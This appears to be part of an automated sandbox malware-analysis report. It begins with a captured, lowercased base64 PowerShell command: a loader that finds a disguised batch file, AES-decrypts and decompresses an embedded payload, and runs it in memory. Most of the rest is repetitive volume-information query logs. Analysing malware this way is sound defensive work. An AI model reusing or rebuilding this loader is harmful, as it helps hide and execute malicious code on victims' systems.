"[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd

Source: logs.dat.8.dr

Binary or memory string: [Program Manager]

Language, Device and Operating System Detection

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
